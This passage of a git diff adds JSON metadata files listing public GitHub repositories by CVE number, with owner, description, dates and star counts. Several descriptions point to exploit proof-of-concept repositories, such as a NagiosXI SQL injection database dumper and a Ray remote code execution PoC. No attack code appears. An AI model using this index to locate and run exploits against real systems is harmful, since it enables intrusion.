"https:\/\/github.com\/LucasVanHaaren", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucasVanHaaren\/CVE-2023-47400", + "description": "Proof of Concept for the CVE-2023-47400", + "fork": false, + "created_at": "2024-01-26T09:35:47Z", + "updated_at": "2024-09-06T10:00:28Z", + "pushed_at": "2024-01-27T10:39:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-47400", + "nagiosxi", + "proof-of-concept" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4741.json b/2023/CVE-2023-4741.json new file mode 100644 index 0000000000..a38d8210f0 --- /dev/null +++ b/2023/CVE-2023-4741.json @@ -0,0 +1,33 @@ +[ + { + "id": 681486230, + "name": "CVE-2023-4741", + "full_name": "wudidike\/CVE-2023-4741", + "owner": { + "login": "wudidike", + "id": 76437404, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76437404?v=4", + "html_url": "https:\/\/github.com\/wudidike", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wudidike\/CVE-2023-4741", + "description": null, + "fork": false, + "created_at": "2023-08-22T06:00:57Z", + "updated_at": "2023-09-05T03:34:39Z", + "pushed_at": "2023-09-05T03:34:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47437.json b/2023/CVE-2023-47437.json new file mode 100644 index 0000000000..e696b4709f --- /dev/null +++ b/2023/CVE-2023-47437.json @@ -0,0 +1,33 @@ +[ + { + "id": 719240166, + "name": "CVE-2023-47437", + "full_name": "herombey\/CVE-2023-47437", + "owner": { + "login": "herombey", + "id": 106621172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106621172?v=4", + "html_url": "https:\/\/github.com\/herombey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/herombey\/CVE-2023-47437", + "description": "Vulnerability Disclosure", + "fork": false, + "created_at": "2023-11-15T18:55:03Z", + "updated_at": "2023-11-22T16:17:44Z", + "pushed_at": "2023-11-16T16:32:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47459.json b/2023/CVE-2023-47459.json new file mode 100644 index 0000000000..573c4cef2b --- /dev/null +++ b/2023/CVE-2023-47459.json @@ -0,0 +1,33 @@ +[ + { + "id": 717109074, + "name": "CVE-2023-47459", + "full_name": "aleksey-vi\/CVE-2023-47459", + "owner": { + "login": "aleksey-vi", + "id": 65017000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65017000?v=4", + "html_url": "https:\/\/github.com\/aleksey-vi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aleksey-vi\/CVE-2023-47459", + "description": null, + "fork": false, + "created_at": "2023-11-10T15:20:48Z", + "updated_at": "2023-11-10T15:20:49Z", + "pushed_at": "2023-11-10T15:31:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47460.json b/2023/CVE-2023-47460.json new file mode 100644 index 0000000000..6f7c50c4f3 --- /dev/null +++ b/2023/CVE-2023-47460.json @@ -0,0 +1,33 @@ +[ + { + "id": 717115700, + "name": "CVE-2023-47460", + "full_name": "aleksey-vi\/CVE-2023-47460", + "owner": { + "login": "aleksey-vi", + "id": 65017000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65017000?v=4", + "html_url": "https:\/\/github.com\/aleksey-vi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aleksey-vi\/CVE-2023-47460", + "description": null, + "fork": false, + "created_at": "2023-11-10T15:38:01Z", + "updated_at": "2023-11-11T13:03:29Z", + "pushed_at": "2023-11-10T18:45:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47464.json b/2023/CVE-2023-47464.json new file mode 100644 index 0000000000..a97aa3513e --- /dev/null +++ b/2023/CVE-2023-47464.json @@ -0,0 +1,33 @@ +[ + { + "id": 757485554, + "name": "CVE-2023-47464", + "full_name": "HadessCS\/CVE-2023-47464", + "owner": { + "login": "HadessCS", + "id": 102136070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102136070?v=4", + "html_url": "https:\/\/github.com\/HadessCS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HadessCS\/CVE-2023-47464", + "description": "CVE-2023-47464 POC", + "fork": false, + "created_at": "2024-02-14T15:39:34Z", + "updated_at": "2024-02-27T15:19:30Z", + "pushed_at": "2024-02-14T15:43:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47488.json b/2023/CVE-2023-47488.json new file mode 100644 index 0000000000..4e8ba4d3d8 --- /dev/null +++ b/2023/CVE-2023-47488.json @@ -0,0 +1,33 @@ +[ + { + "id": 719187938, + "name": "CVE-2023-47488", + "full_name": "nitipoom-jar\/CVE-2023-47488", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-47488", + "description": null, + "fork": false, + "created_at": "2023-11-15T16:32:01Z", + "updated_at": "2023-11-15T16:47:44Z", + "pushed_at": "2023-11-15T16:47:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47489.json b/2023/CVE-2023-47489.json new file mode 100644 index 0000000000..892e82851e --- /dev/null +++ b/2023/CVE-2023-47489.json @@ -0,0 +1,33 @@ +[ + { + "id": 719177600, + "name": "CVE-2023-47489", + "full_name": "nitipoom-jar\/CVE-2023-47489", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-47489", + "description": null, + "fork": false, + "created_at": "2023-11-15T16:07:02Z", + "updated_at": "2023-11-15T16:26:32Z", + "pushed_at": "2023-11-15T16:48:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47504.json b/2023/CVE-2023-47504.json new file mode 100644 index 0000000000..56453ff324 --- /dev/null +++ b/2023/CVE-2023-47504.json @@ -0,0 +1,33 @@ +[ + { + "id": 817443436, + "name": "CVE-2023-47504-POC", + "full_name": "davidxbors\/CVE-2023-47504-POC", + "owner": { + "login": "davidxbors", + "id": 22767204, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22767204?v=4", + "html_url": "https:\/\/github.com\/davidxbors", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davidxbors\/CVE-2023-47504-POC", + "description": null, + "fork": false, + "created_at": "2024-06-19T18:07:56Z", + "updated_at": "2024-06-23T13:34:47Z", + "pushed_at": "2024-06-19T18:54:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47529.json b/2023/CVE-2023-47529.json new file mode 100644 index 0000000000..1bceaf4540 --- /dev/null +++ b/2023/CVE-2023-47529.json @@ -0,0 +1,33 @@ +[ + { + "id": 718085174, + "name": "CVE-2023-47529", + "full_name": "RandomRobbieBF\/CVE-2023-47529", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-47529", + "description": "Cloud Templates & Patterns collection <= 1.2.2 - Sensitive Information Exposure via Log File", + "fork": false, + "created_at": "2023-11-13T10:50:25Z", + "updated_at": "2023-11-15T00:30:33Z", + "pushed_at": "2023-11-13T10:51:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47564.json b/2023/CVE-2023-47564.json new file mode 100644 index 0000000000..83deb82286 --- /dev/null +++ b/2023/CVE-2023-47564.json @@ -0,0 +1,37 @@ +[ + { + "id": 752666257, + "name": "CVE-2023-47564", + "full_name": "C411e\/CVE-2023-47564", + "owner": { + "login": "C411e", + "id": 35147719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35147719?v=4", + "html_url": "https:\/\/github.com\/C411e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C411e\/CVE-2023-47564", + "description": "CVE-2023-47564", + "fork": false, + "created_at": "2024-02-04T13:25:58Z", + "updated_at": "2024-02-05T08:16:00Z", + "pushed_at": "2024-02-05T08:20:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "hacking", + "pentesting" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4762.json b/2023/CVE-2023-4762.json new file mode 100644 index 0000000000..4ac6beb70f --- /dev/null +++ b/2023/CVE-2023-4762.json @@ -0,0 +1,64 @@ +[ + { + "id": 697220206, + "name": "CVE-2023-4762", + "full_name": "buptsb\/CVE-2023-4762", + "owner": { + "login": "buptsb", + "id": 666724, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/666724?v=4", + "html_url": "https:\/\/github.com\/buptsb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/buptsb\/CVE-2023-4762", + "description": null, + "fork": false, + "created_at": "2023-09-27T09:43:20Z", + "updated_at": "2024-10-28T17:29:04Z", + "pushed_at": "2023-09-27T10:39:47Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 27, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 697340903, + "name": "CVE-2023-4762-Code-Review", + "full_name": "sherlocksecurity\/CVE-2023-4762-Code-Review", + "owner": { + "login": "sherlocksecurity", + "id": 52328067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52328067?v=4", + "html_url": "https:\/\/github.com\/sherlocksecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sherlocksecurity\/CVE-2023-4762-Code-Review", + "description": null, + "fork": false, + "created_at": "2023-09-27T14:29:43Z", + "updated_at": "2023-09-27T15:13:59Z", + "pushed_at": "2023-09-27T14:30:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47668.json b/2023/CVE-2023-47668.json new file mode 100644 index 0000000000..9ee7cc5b75 --- /dev/null +++ b/2023/CVE-2023-47668.json @@ -0,0 +1,33 @@ +[ + { + "id": 718515517, + "name": "CVE-2023-47668", + "full_name": "RandomRobbieBF\/CVE-2023-47668", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-47668", + "description": "Restrict Content <= 3.2.7 - Information Exposure via legacy log file", + "fork": false, + "created_at": "2023-11-14T08:40:49Z", + "updated_at": "2023-11-14T08:40:50Z", + "pushed_at": "2023-11-14T08:41:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4771.json b/2023/CVE-2023-4771.json new file mode 100644 index 0000000000..15db1f8502 --- /dev/null +++ b/2023/CVE-2023-4771.json @@ -0,0 +1,33 @@ +[ + { + "id": 812954720, + "name": "CVE-2023-4771", + "full_name": "sahar042\/CVE-2023-4771", + "owner": { + "login": "sahar042", + "id": 49879157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49879157?v=4", + "html_url": "https:\/\/github.com\/sahar042", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sahar042\/CVE-2023-4771", + "description": "CVE-2023-4771 PoC CKEditor 4 Cross-site scripting (XSS) vulnerability in AJAX sample", + "fork": false, + "created_at": "2024-06-10T08:19:24Z", + "updated_at": "2024-10-08T09:18:51Z", + "pushed_at": "2024-07-23T07:48:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47840.json b/2023/CVE-2023-47840.json new file mode 100644 index 0000000000..0893a227d7 --- /dev/null +++ b/2023/CVE-2023-47840.json @@ -0,0 +1,33 @@ +[ + { + "id": 725279708, + "name": "CVE-2023-47840", + "full_name": "RandomRobbieBF\/CVE-2023-47840", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-47840", + "description": "Qode Essential Addons <= 1.5.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation\/Activation", + "fork": false, + "created_at": "2023-11-29T20:14:39Z", + "updated_at": "2023-12-08T15:43:36Z", + "pushed_at": "2023-11-29T20:17:49Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47882.json b/2023/CVE-2023-47882.json new file mode 100644 index 0000000000..e00c9e32f9 --- /dev/null +++ b/2023/CVE-2023-47882.json @@ -0,0 +1,36 @@ +[ + { + "id": 714795483, + "name": "yi", + "full_name": "actuator\/yi", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/yi", + "description": "CVE-2023-47882 | CVE-2024-23727", + "fork": false, + "created_at": "2023-11-05T20:37:24Z", + "updated_at": "2024-03-24T16:26:09Z", + "pushed_at": "2024-03-24T16:16:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-47882", + "cve-2024-23727" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47883.json b/2023/CVE-2023-47883.json new file mode 100644 index 0000000000..9ffc93de48 --- /dev/null +++ b/2023/CVE-2023-47883.json @@ -0,0 +1,35 @@ +[ + { + "id": 692875423, + "name": "com.altamirano.fabricio.tvbrowser", + "full_name": "actuator\/com.altamirano.fabricio.tvbrowser", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.altamirano.fabricio.tvbrowser", + "description": "CVE-2023-47883", + "fork": false, + "created_at": "2023-09-17T21:01:22Z", + "updated_at": "2024-01-16T17:22:16Z", + "pushed_at": "2024-01-17T02:34:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-47883" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47889.json b/2023/CVE-2023-47889.json new file mode 100644 index 0000000000..e6ce473f53 --- /dev/null +++ b/2023/CVE-2023-47889.json @@ -0,0 +1,36 @@ +[ + { + "id": 712680513, + "name": "com.bdrm.superreboot", + "full_name": "actuator\/com.bdrm.superreboot", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.bdrm.superreboot", + "description": "CVE-2023-47889 | CVE-2023-47354", + "fork": false, + "created_at": "2023-11-01T00:57:11Z", + "updated_at": "2024-02-02T02:40:30Z", + "pushed_at": "2023-11-01T01:12:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-47354", + "cve-2023-47889" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4800.json b/2023/CVE-2023-4800.json new file mode 100644 index 0000000000..20a2827029 --- /dev/null +++ b/2023/CVE-2023-4800.json @@ -0,0 +1,33 @@ +[ + { + "id": 695846229, + "name": "CVE-2023-4800", + "full_name": "b0marek\/CVE-2023-4800", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4800", + "description": "Repository for CVE-2023-4800 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T12:11:58Z", + "updated_at": "2023-09-24T12:11:59Z", + "pushed_at": "2023-09-24T12:18:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48022.json b/2023/CVE-2023-48022.json new file mode 100644 index 0000000000..d1fbace920 --- /dev/null +++ b/2023/CVE-2023-48022.json @@ -0,0 +1,64 @@ +[ + { + "id": 741317419, + "name": "CVE-2023-48022", + "full_name": "0x656565\/CVE-2023-48022", + "owner": { + "login": "0x656565", + "id": 84010223, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84010223?v=4", + "html_url": "https:\/\/github.com\/0x656565", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x656565\/CVE-2023-48022", + "description": "CVE-2023-48022 exploit modified from Bishop Fox work", + "fork": false, + "created_at": "2024-01-10T06:26:01Z", + "updated_at": "2024-03-28T17:24:01Z", + "pushed_at": "2024-01-10T06:33:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779214530, + "name": "ShadowRay-RCE-PoC-CVE-2023-48022", + "full_name": "jakabakos\/ShadowRay-RCE-PoC-CVE-2023-48022", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/ShadowRay-RCE-PoC-CVE-2023-48022", + "description": "ShadowRay RCE POC (CVE-2023-48022)", + "fork": false, + "created_at": "2024-03-29T09:54:31Z", + "updated_at": "2024-11-13T11:55:02Z", + "pushed_at": "2024-04-02T06:35:40Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48028.json b/2023/CVE-2023-48028.json new file mode 100644 index 0000000000..12cc79b029 --- /dev/null +++ b/2023/CVE-2023-48028.json @@ -0,0 +1,33 @@ +[ + { + "id": 719728314, + "name": "CVE-2023-48028", + "full_name": "nitipoom-jar\/CVE-2023-48028", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48028", + "description": null, + "fork": false, + "created_at": "2023-11-16T19:22:30Z", + "updated_at": "2023-12-07T17:11:21Z", + "pushed_at": "2023-11-16T19:32:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48029.json b/2023/CVE-2023-48029.json new file mode 100644 index 0000000000..102750ce61 --- /dev/null +++ b/2023/CVE-2023-48029.json @@ -0,0 +1,33 @@ +[ + { + "id": 719714263, + "name": "CVE-2023-48029", + "full_name": "nitipoom-jar\/CVE-2023-48029", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48029", + "description": null, + "fork": false, + "created_at": "2023-11-16T18:42:12Z", + "updated_at": "2023-11-16T19:01:29Z", + "pushed_at": "2023-11-16T19:30:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48031.json b/2023/CVE-2023-48031.json new file mode 100644 index 0000000000..636a6a8149 --- /dev/null +++ b/2023/CVE-2023-48031.json @@ -0,0 +1,33 @@ +[ + { + "id": 719696300, + "name": "CVE-2023-48031", + "full_name": "nitipoom-jar\/CVE-2023-48031", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48031", + "description": null, + "fork": false, + "created_at": "2023-11-16T17:57:20Z", + "updated_at": "2023-11-16T18:00:09Z", + "pushed_at": "2023-11-16T18:00:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48034.json b/2023/CVE-2023-48034.json new file mode 100644 index 0000000000..da3b26fcaa --- /dev/null +++ b/2023/CVE-2023-48034.json @@ -0,0 +1,33 @@ +[ + { + "id": 721226835, + "name": "CVE-2023-48034", + "full_name": "aprkr\/CVE-2023-48034", + "owner": { + "login": "aprkr", + "id": 70669787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70669787?v=4", + "html_url": "https:\/\/github.com\/aprkr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aprkr\/CVE-2023-48034", + "description": "Weak encryption in Acer Wireless Keyboard SK-9662 allows attacker in physical proximity to both decrypt wireless keystrokes and inject wireless arbitrary keystrokes.", + "fork": false, + "created_at": "2023-11-20T16:04:24Z", + "updated_at": "2023-11-22T14:05:37Z", + "pushed_at": "2023-11-20T18:40:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48084.json b/2023/CVE-2023-48084.json new file mode 100644 index 0000000000..75cdab59a6 --- /dev/null +++ b/2023/CVE-2023-48084.json @@ -0,0 +1,64 @@ +[ + { + "id": 765513024, + "name": "CVE-2023-48084", + "full_name": "Hamibubu\/CVE-2023-48084", + "owner": { + "login": "Hamibubu", + "id": 108554878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108554878?v=4", + "html_url": "https:\/\/github.com\/Hamibubu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hamibubu\/CVE-2023-48084", + "description": "Python program to dump all the databases, exploiting NagiosXI sqli vulnerability", + "fork": false, + "created_at": "2024-03-01T04:06:15Z", + "updated_at": "2024-03-22T22:48:59Z", + "pushed_at": "2024-03-01T04:22:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 776233003, + "name": "CVE-2023-48084", + "full_name": "bucketcat\/CVE-2023-48084", + "owner": { + "login": "bucketcat", + "id": 91589201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91589201?v=4", + "html_url": "https:\/\/github.com\/bucketcat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bucketcat\/CVE-2023-48084", + "description": "Fixes broken syntax in the POC, automates the API_Token retrieval, stores the token as a variable and pipes into the fixed POC.", + "fork": false, + "created_at": "2024-03-23T00:31:37Z", + "updated_at": "2024-03-23T01:16:32Z", + "pushed_at": "2024-03-23T04:00:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48104.json b/2023/CVE-2023-48104.json new file mode 100644 index 0000000000..762803239f --- /dev/null +++ b/2023/CVE-2023-48104.json @@ -0,0 +1,33 @@ +[ + { + "id": 741537406, + "name": "CVE-2023-48104", + "full_name": "E1tex\/CVE-2023-48104", + "owner": { + "login": "E1tex", + "id": 134239936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134239936?v=4", + "html_url": "https:\/\/github.com\/E1tex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/E1tex\/CVE-2023-48104", + "description": "HTML Injection in Alinto\/SOGo Web Client", + "fork": false, + "created_at": "2024-01-10T15:49:48Z", + "updated_at": "2024-01-10T16:09:29Z", + 